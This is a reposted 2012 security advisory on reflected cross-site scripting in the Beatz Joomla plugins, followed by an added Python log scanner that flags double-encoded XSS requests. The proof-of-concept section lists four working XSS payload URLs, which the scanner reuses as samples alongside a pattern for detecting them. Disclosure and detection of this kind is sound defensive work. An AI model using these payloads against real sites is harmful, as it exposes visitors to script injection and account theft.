backdoor
Posted April 18, 2012

Info

1. OVERVIEW

Beatz 1.x versions are vulnerable to Cross Site Scripting.

2. BACKGROUND

Beatz is a set of powerful Social Networking Script Joomla! 1.5 plugins that allows you to start your own favourite artist band website. Although it is just a Joomla! plugin, it comes with a full Joomla! bundle for ease of use and installation.

3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. The vulnerable plugins include: com_find, com_charts and com_videos.

4. VERSIONS AFFECTED

Tested in 1.x versions

5. PROOF-OF-CONCEPT/EXPLOIT

== Generic Joomla! 1.5 Double Encoding XSS

http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1

== com_charts (parameter: do)

http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts

== com_find (parameter: keyword)

http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find

== com_videos (parameter: video_keyword)

http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search

6. SOLUTION

The vendor hasn't released the fix yet.

7. VENDOR

Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2011-03-01: notified vendor
2012-04-15: vulnerability disclosed

10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss#yehg [2012-04-15]

Source: Joomla Beatz 1.x Cross Site Scripting - Packet Storm
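An added detection example (not part of the advisory or of Beatz) for anyone reviewing access logs for the request shapes listed above: it percent-decodes each query parameter name and value repeatedly until the text stops changing, flags parameters that needed a second decoding pass (the trick the "double encoding" PoC depends on) and reports HTML/script markers that have no business in a search keyword. The sample request paths are constructed here from the advisory's PoC URLs and are not real traffic.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample request paths modelled on the advisory's PoC URLs (not real log data).
SAMPLE_REQUESTS = [
    "/beatz/?option=com_content&view=frontpage&limitstart=5"
    "&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574"
    "%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1",
    "/beatz/index.php?do=listAll&keyword=++Search\"><img+src=0+onerror=prompt(/XSS/)>&option=com_find",
    "/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic"
    "&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;"
    "height:1000px;display:block;\"%20x=%22&option=com_charts",
    "/beatz/index.php?option=com_find&do=listAll&keyword=acoustic+guitar",  # benign search
]

# Fragments that should never appear in a decoded search keyword or parameter name.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|body)\b|\bon[a-z]+\s*=|javascript\s*:|\bstyle\s*=",
    re.I,
)


def fully_decode(value, max_rounds=5):
    """Percent-decode until the string stops changing; return (text, decoding rounds used)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_request(path):
    """Return one finding per parameter name or value that carries XSS markers after decoding."""
    findings = []
    for pair in urlsplit(path).query.split("&"):
        name, _, value = pair.partition("=")
        for part, raw in (("name", name), ("value", value)):
            text, rounds = fully_decode(raw)
            hits = sorted({m.group(0).lower() for m in XSS_MARKERS.finditer(text)})
            if hits:
                findings.append({"param": name[:40], "part": part,
                                 "double_encoded": rounds >= 2, "markers": hits})
    return findings


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req[:60], "->", inspect_request(req) or "clean")
```

Run against a real access log, feed each request path to inspect_request(); a hit with double_encoded set to True is the signature of the first PoC, while the others show up as raw event-handler or style attributes in a keyword parameter.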